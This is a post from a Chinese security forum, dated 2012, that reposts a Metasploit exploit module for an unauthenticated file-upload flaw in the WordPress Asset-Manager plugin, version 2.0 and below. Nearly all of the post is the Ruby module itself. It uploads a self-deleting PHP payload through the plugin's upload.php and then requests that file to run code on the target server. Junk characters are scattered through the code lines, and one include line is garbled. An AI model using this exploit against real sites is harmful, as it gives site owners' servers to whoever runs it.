找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2108|回复: 0
打印 上一主题 下一主题

WordPress Asset-Manager PHP文件上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-31 09:22:33 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。
/ u* \* G5 Z. _$ J( x3 X% a
* M% v$ n; f! g2 Z##
( |2 t! O8 f" f# o& m. E- f; o# This file is part of the Metasploit Framework and may be subject to* f, Z& W, o! J# q: K
# redistribution and commercial restrictions. Please see the Metasploit
+ t0 [! @8 G. {' F# Framework web site for more information on licensing and terms of use.
9 y" p; s. V3 u#   http://metasploit.com/framework/
/ x  d& U- d3 g- n) W% V7 c##
3 c. T4 z; q0 m5 d# ]# }2 |
. c# T" d- G: b' u' ^9 B$ ~* l( ~& Crequire 'msf/core'4 y: ]3 w# J# d2 c1 P
require 'msf/core/exploit/php_exe'
. O4 U- j: `1 l5 t1 p
# h, r. R+ C+ H6 X5 l' B7 _class Metasploit3 < Msf::Exploit::Remote
( b5 {' w7 L2 V3 v" q' b  Rank = ExcellentRanking/ E# c1 I3 |  I8 Q

" g# D! N8 m5 L+ H# z" z  include Msf::Exploit::Remote::HttpClient
1 u6 r. a- T" e* n1 b! X* B! h  include Msf::Exploit:hpEXE
1 y& V; c; w; g4 A5 D0 d
8 B/ Z, g" R: X- M6 ?# C3 j' Q! \$ @  def initialize(info = {})( G3 Z0 B& i7 q/ r
    super(update_info(info,
6 t6 Y$ h& Y9 y: g7 D      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
% w4 S/ H3 s1 L8 D      'Description'    => %q{
( y# O2 L6 d; B/ ~9 O8 z        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress- T' i$ o2 z5 g- }4 q- `
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
/ b; M% |1 |% f& j; q        temp directory without authentication, which results in arbitrary code execution.
7 y$ o1 o, z( X: n' T9 y6 ]' {( C      },
3 A' f- h2 \) |" r0 C) e      'Author'         =>! e0 E2 i* D/ i# P
        [8 H3 H# d! S$ j6 h
          'Sammy FORGIT', # initial discovery
9 {* {1 j& B* m4 ]$ y          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
$ y/ u9 u5 n, d* ]& ]: `        ],% g2 ^4 c7 i3 U6 ^9 c. V# P' R9 z
      'License'        => MSF_LICENSE,
3 F# E7 x5 s) j1 e# |      'References'     =>% _/ R' `3 s% m$ x/ z2 e
        [3 v6 K5 m" T$ y) b
          [ 'OSVDB', '82653' ],
* Y7 a& S, ~: f7 m- x" m1 S          [ 'BID', '53809' ],
" s/ g: E0 j' p6 H          [ 'EDB', '18993' ],) C/ v$ l* l* B; E+ [' m$ [1 C8 P
          [ 'URL', 'http:// www.myhack58.com /' ]
% X5 }- a' n& X        ],9 U& }: g; ?) x+ U: E
      'Payload'       =>; e' u' v1 y5 j, p; V
        {& a2 w: a9 i  Z- d2 f) B; e' i
          'BadChars' => "\x00",4 G6 g8 y" }8 O% @# @' m2 N" Y" P
        },
+ |) Y: [0 Z! [  X$ H: N      'Platform'       => 'php',
+ U3 K- ?& |, z4 _) ]      'Arch'           => ARCH_PHP,
% p0 A3 d" D/ Z7 D7 r/ P! R8 E: p      'Targets'        =>( P4 i1 y* N6 ^) p" G% H2 i
        [
2 w0 U( c( E; @6 s3 g          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],2 T. q! }9 b+ K9 `
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
* S( @* p8 P/ e1 @, H" ]( y        ],
% Q  D7 e/ K4 {+ e      'DefaultTarget' => 0,: p6 [* v- |* m" y2 o% T8 C% W6 w
      'DisclosureDate' => 'May 26 2012'))
5 e2 e' O$ a" w
' O& `1 _1 C' Z5 l2 `    register_options(
2 k# A$ H& y. z5 w1 k6 d      [
0 T7 b! M! F/ \; c# f' C        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
2 G+ G4 @, a) n6 Q: F  d& d& m      ], self.class)9 d; t* u8 X+ }% B1 m
  end
* W5 L; B$ @* q 8 F/ P, W) H7 P5 E1 m$ `# P- \
  def exploit
" \3 v7 Q$ T) n# h3 r; r  T; L) |; r( R    uri =  target_uri.path
: t% a2 x& y$ q    uri << '/' if uri[-1,1] != '/'
- w9 u) N- T6 j8 m0 }, {6 }    peer = "#{rhost}:#{rport}"  [& N  [- |! l! I  W. ~
    payload_name = "#{rand_text_alpha(5)}.php"
0 M, l. l- L( D9 ~+ t& \9 [4 @- ]    php_payload = get_write_exec_payload(:unlink_self=>true)  |$ z% x. a1 e# r" L8 ?- ~( i% V
7 x6 h, x+ V! Y/ J7 _0 C, r2 R
    data = Rex::MIME::Message.new
+ i( l; Z7 `6 M% j. U" {8 b    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")" o3 }, P- G+ T  |
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
6 l5 s6 {, [7 w* Q
, s3 ^6 J2 A' v: J& u( g    print_status("#{peer} - Uploading payload #{payload_name}")
% f$ u2 S& H$ }5 B; r/ N    res = send_request_cgi({
+ |6 b; {2 d1 l1 ~9 q7 q      'method'  => 'POST',
3 i0 w6 V0 M/ ?) j" D/ s- S) p      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",8 O. g  h- {4 w+ h* G$ r0 w
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",5 [1 z& w! l4 O
      'data'    => post_data& L+ T! M- A/ `  T* U
    })
$ |0 T: L$ [% l+ s' I) {& [) L* Z' h7 L
; S: G) e: N$ }' x/ n    if not res or res.code != 200 or res.body !~ /#{payload_name}/
4 ^4 v2 Z# m/ W, H3 @      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
; @/ d5 @$ S4 |' D* I0 S6 t% D2 ~; Iend
/ I1 Y) Y  F# Y$ J/ @! o 6 R: N2 n' i5 w) C" A# O
    print_status("#{peer} - Executing payload #{payload_name}")
2 F) G1 t- B( ?/ Y* y- f3 M    res = send_request_raw({
; g# j- c. V1 `9 r7 R      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",8 q* D# b- _+ {) [# Z/ O
      'method'  => 'GET'
: U' \2 V- Y( i3 G! N  L9 v$ f& \    })
# q9 q0 x  O+ W. s
' e! V  Z. n- i3 S    if res and res.code != 200
1 }4 T1 P% V! ^1 j( t  Z, ]      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")! e- P- c& q- X$ V3 [/ q. w
    end
5 ]9 @8 \$ c) Z) z2 U  end
* p9 W1 B' b6 p% Rend
# s' I* H0 k) R" c5 ]  M2 o( N) D0 {
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表